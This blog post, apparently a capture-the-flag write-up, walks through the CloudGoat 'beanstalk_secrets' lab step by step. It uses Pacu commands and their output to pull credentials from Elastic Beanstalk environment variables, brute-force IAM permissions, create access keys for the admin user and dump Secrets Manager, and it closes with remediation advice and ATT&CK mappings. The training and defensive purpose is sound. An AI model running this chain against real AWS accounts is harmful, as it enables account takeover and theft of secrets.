denesbeck

Posted on Mar 16 • Originally published at arcade-lab.io

🥷 CloudGoat: Beanstalk Secrets (Pacu): Write-up: From low-privilege user to admin (Pacu approach)

#hacking #writeup #cloudgoat #aws

🥷 CloudGoat: Beanstalk Secrets (Pacu)

Write-up: From low-privilege user to admin (Pacu approach)

🧭 Overview

Scenario: beanstalk_secrets \
Platform: CloudGoat (Rhino Security Labs) \
Tools: Pacu - AWS Exploitation Framework \
Objective: Extract secrets from Elastic Beanstalk, escalate to admin, and retrieve the flag.

⚔️ Attack Path Summary

Low-Priv User → Beanstalk Enum → Secondary Creds → IAM Enum → Privesc Scan → CreateAccessKey → Admin → Flag

🔑 Phase 1: Initial Access

Configure Low-Privilege Profile

aws configure --profile ebs-1
# Access Key: AKIA****************
# Secret Key: L2kgjSenMDGZyJeiySZW********************

Launch Pacu and Import Keys

pacu

Pacu > import_keys ebs-1

Validate Session

Pacu > whoami

{
  "AccessKeyId": "AKIA****************",
  "SecretAccessKey": "L2kgjSenMDGZyJeiySZW********************",
  "KeyAlias": "imported-ebs-1"
}

🔎 Phase 2: Elastic Beanstalk Enumeration

Discover Available Modules

Pacu > ls
Pacu > search beanstalk
Pacu > help elasticbeanstalk__enum

Run Enumeration

Pacu > run elasticbeanstalk__enum --region us-east-1

[elasticbeanstalk__enum] Enumerating BeanStalk data in region us-east-1...
[elasticbeanstalk__enum]   1 application(s) found in us-east-1.
[elasticbeanstalk__enum]   1 environment(s) found in us-east-1.
    Potential secret in environment variable: SSHSourceRestriction => tcp,22,22,0.0.0.0/0
    Potential secret in environment variable: EnvironmentVariables => SECONDARY_SECRET_KEY=ZTh2BV46l3PBNkEFNfnZ********************,PYTHONPATH=/var/app/venv/staging-LQM1lest/bin,SECONDARY_ACCESS_KEY=AKIA****************
    Potential secret in environment variable: SECONDARY_ACCESS_KEY => AKIA****************
[elasticbeanstalk__enum]   3 potential secret(s) found in config settings.

Secret Name	Value
`SECONDARY_ACCESS_KEY`	`AKIA****************`
`SECONDARY_SECRET_KEY`	`ZTh2BV46l3PBNkEFNfnZ********************`

Credentials extracted from environment variables.

🔍 Phase 3: Initial User Permission Analysis

Bruteforce Permissions

Pacu > search iam
Pacu > run iam__bruteforce_permissions --region us-east-1

[iam__bruteforce_permissions] Starting permission enumeration for access-key-id "AKIA****************"
[iam__bruteforce_permissions] -- Account ARN : arn:aws:iam::7912********:user/cgid135wosdg8e_low_priv_user
[iam__bruteforce_permissions] -- sts.get_session_token() worked!
[iam__bruteforce_permissions] -- sts.get_caller_identity() worked!
[iam__bruteforce_permissions] -- ec2.describe_subnets() worked!
[iam__bruteforce_permissions] -- dynamodb.describe_endpoints() worked!

Permission	Significance
`sts:GetCallerIdentity`	Credentials are valid
`sts:GetSessionToken`	Can request temporary credentials (MFA not enforced)
`ec2:DescribeSubnets`	Infrastructure recon data
`dynamodb:DescribeEndpoints`	Low impact

👤 Phase 4: Pivot to Secondary User

Configure and Import Secondary Credentials

aws configure --profile ebs-2
# Access Key: AKIA****************
# Secret Key: ZTh2BV46l3PBNkEFNfnZ********************

Pacu > swap_session
Pacu > import_keys ebs-2
Pacu > whoami

🗄️ Phase 5: Secondary User IAM Enumeration

Bruteforce Permissions

Pacu > run iam__bruteforce_permissions --region us-east-1

[iam__bruteforce_permissions] User "cgid135wosdg8e_secondary_user" has 1 attached policies
[iam__bruteforce_permissions] -- Policy "cgid135wosdg8e_secondary_policy"
[iam__bruteforce_permissions] -- iam.list_users() worked!
[iam__bruteforce_permissions] -- iam.list_policies() worked!
[iam__bruteforce_permissions] -- iam.list_roles() worked!

Found users:

Username	Note
`cgid135wosdg8e_admin_user`	Target
`cgid135wosdg8e_low_priv_user`	Initial access
`cgid135wosdg8e_secondary_user`	Current user

Enumerate Detailed Permissions

Pacu > run iam__enum_permissions
Pacu > whoami

{
  "UserName": "cgid135wosdg8e_secondary_user",
  "Permissions": {
    "Allow": {
      "iam:createaccesskey": { "Resources": ["*"] },
      "iam:listusers": { "Resources": ["*"] },
      "iam:getpolicy": { "Resources": ["*"] },
      "iam:getpolicyversion": { "Resources": ["*"] },
      "iam:listroles": { "Resources": ["*"] },
      "iam:listattacheduserpolicies": { "Resources": ["*"] }
    }
  }
}

Critical Finding

Permission	Resource	Impact
`iam:CreateAccessKey`	`*` (wildcard)	Can create access keys for ANY user

💥 Phase 6: Privilege Escalation

Scan for Escalation Paths

Pacu > search privesc
Pacu > run iam__privesc_scan --scan-only

[iam__privesc_scan] Escalation methods for current user:
[iam__privesc_scan]   CONFIRMED: CreateAccessKey
[iam__privesc_scan]   POTENTIAL: AttachUserPolicy
[iam__privesc_scan]   POTENTIAL: CreateLoginProfile
[iam__privesc_scan]   POTENTIAL: CreateNewPolicyVersion
[...]

Execute Privilege Escalation

Pacu > run iam__privesc_scan --user-methods CreateAccessKey

[iam__privesc_scan] Found 3 user(s). Choose a user below.
[iam__privesc_scan]   [0] Other (Manually enter user name)
[iam__privesc_scan]   [1] cgid135wosdg8e_admin_user
[iam__privesc_scan]   [2] cgid135wosdg8e_low_priv_user
[iam__privesc_scan]   [3] cgid135wosdg8e_secondary_user
[iam__privesc_scan] Choose an option: 1

[iam__backdoor_users_keys] Backdoor the following users?
[iam__backdoor_users_keys]   cgid135wosdg8e_admin_user
[iam__backdoor_users_keys]     Access Key ID: AKIA****************
[iam__backdoor_users_keys]     Secret Key: fswAMaOCaa6Fxdxc4ii8********************
[iam__privesc_scan] Privilege escalation was successful

🚩 Phase 7: Capture the Flag

Configure Admin Profile and Switch Session

aws configure --profile admin

Pacu > swap_session
Pacu > import_keys admin

Enumerate Secrets

Pacu > search secret
Pacu > run secrets__enum --region us-east-1

[secrets__enum] Starting region us-east-1...
[secrets__enum]  Found secret: cgid135wosdg8e_final_flag
[secrets__enum] secrets__enum completed.

[secrets__enum] MODULE SUMMARY:
    1 Secret(s) were found in AWS secretsmanager
    Check ~/.local/share/pacu/<session name>/downloads/secrets/ to get the values

Retrieve Flag

cat ~/.local/share/pacu/admin/downloads/secrets/secrets_manager/secrets.txt

cgid135wosdg8e_final_flag:FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}

📐 Attack Chain Diagram

┌─────────────────────┐
│   Low-Priv User     │
│   (ebs-1 profile)   │
└──────────┬──────────┘
           │ elasticbeanstalk__enum
           ▼
┌─────────────────────┐
│  Beanstalk Secrets  │
│  - Access Key       │
│  - Secret Key       │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  Secondary User     │
│   (ebs-2 profile)   │
└──────────┬──────────┘
           │ iam__privesc_scan (CreateAccessKey)
           ▼
┌─────────────────────┐
│    Admin User       │
│  (admin profile)    │
└──────────┬──────────┘
           │ secrets__enum
           ▼
┌─────────────────────┐
│       FLAG          │
└─────────────────────┘

🚨 Vulnerabilities Exploited

#	Vulnerability	CWE
1	Hardcoded credentials in Beanstalk environment variables	CWE-798
2	Overly permissive IAM policy (`iam:CreateAccessKey` on `*`)	CWE-732
3	Lack of least privilege principle	CWE-250

💡 Remediation

Do not store long-lived AWS credentials in environment variables - Use AWS Secrets Manager or SSM Parameter Store
Restrict iam:CreateAccessKey - Scope to self only:

    {
      "Effect": "Allow",
      "Action": "iam:CreateAccessKey",
      "Resource": "arn:aws:iam::*:user/${aws:username}"
    }

Enable CloudTrail alerts for CreateAccessKey API calls
Regular IAM Access Analyzer scans to detect overly permissive policies

🎯 MITRE ATT&CK Mapping

Tactic	Technique	ID
Credential Access	Unsecured Credentials: Credentials in Files / Environment Variables	T1552.001
Discovery	Cloud Service Discovery	T1526
Privilege Escalation	Valid Accounts: Cloud Accounts	T1078.004
Persistence	Account Manipulation: Additional Cloud Credentials	T1098.001

🛠️ Pacu Commands Reference

# Session Management
import_keys <profile>         # Import AWS CLI credentials
swap_session                  # Switch between Pacu sessions
whoami                        # Display current session info

# Discovery
ls                            # List all modules
search <keyword>              # Search for modules
help <module>                 # Get module help

# Elastic Beanstalk
run elasticbeanstalk__enum --region <region>

# IAM Enumeration
run iam__bruteforce_permissions --region <region>
run iam__enum_permissions

# Privilege Escalation
run iam__privesc_scan --scan-only
run iam__privesc_scan --user-methods <method>

# Secrets
run secrets__enum --region <region>

You can also read this post on my portfolio page.

DEV Community

🥷 CloudGoat: Beanstalk Secrets (Pacu): Write-up: From low-privilege user to admin (Pacu approach)

🥷 CloudGoat: Beanstalk Secrets (Pacu)

🧭 Overview

⚔️ Attack Path Summary

🔑 Phase 1: Initial Access

Configure Low-Privilege Profile

Launch Pacu and Import Keys

Validate Session

🔎 Phase 2: Elastic Beanstalk Enumeration

Discover Available Modules

Run Enumeration

🔍 Phase 3: Initial User Permission Analysis

Bruteforce Permissions

👤 Phase 4: Pivot to Secondary User

Configure and Import Secondary Credentials

🗄️ Phase 5: Secondary User IAM Enumeration

Bruteforce Permissions

Enumerate Detailed Permissions

Critical Finding

💥 Phase 6: Privilege Escalation

Scan for Escalation Paths

Execute Privilege Escalation

🚩 Phase 7: Capture the Flag

Configure Admin Profile and Switch Session

Enumerate Secrets

Retrieve Flag

📐 Attack Chain Diagram

🚨 Vulnerabilities Exploited

💡 Remediation

🎯 MITRE ATT&CK Mapping

🛠️ Pacu Commands Reference

Top comments (0)